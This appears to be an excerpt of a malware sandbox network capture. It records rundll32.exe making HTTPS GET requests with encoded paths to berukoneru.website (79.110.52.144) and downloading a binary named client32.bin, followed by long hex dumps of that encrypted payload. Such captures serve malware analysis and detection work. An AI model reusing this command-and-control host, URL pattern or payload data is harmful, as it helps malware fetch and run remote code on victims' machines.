                            0192.168.2.64981279.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:38 UTC0OUTGET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:38 UTC0INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:38 GMT
                            Content-Type: application/zip
                            Content-Length: 213639
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=7dqmvvfrme1greav2ihm5lh9u3; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:38 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:38 UTC0INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                            Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                            2021-12-14 09:21:38 UTC16INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                            Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                            2021-12-14 09:21:38 UTC32INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                            Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                            2021-12-14 09:21:38 UTC48INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                            Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                            2021-12-14 09:21:38 UTC64INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                            Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                            2021-12-14 09:21:38 UTC80INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                            Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                            2021-12-14 09:21:38 UTC96INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                            Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                            2021-12-14 09:21:38 UTC112INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                            Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                            2021-12-14 09:21:38 UTC128INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                            Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                            2021-12-14 09:21:38 UTC144INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                            Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                            2021-12-14 09:21:38 UTC160INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                            Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                            2021-12-14 09:21:38 UTC176INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                            Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                            2021-12-14 09:21:38 UTC192INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                            Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                            2021-12-14 09:21:38 UTC208INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                            Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.64981379.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:39 UTC209OUTGET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC209INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 213639
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=to2kun6u6g028rf2mb4cgnplm5; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC210INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                            Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                            2021-12-14 09:21:39 UTC225INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                            Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                            2021-12-14 09:21:39 UTC241INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                            Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                            2021-12-14 09:21:39 UTC257INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 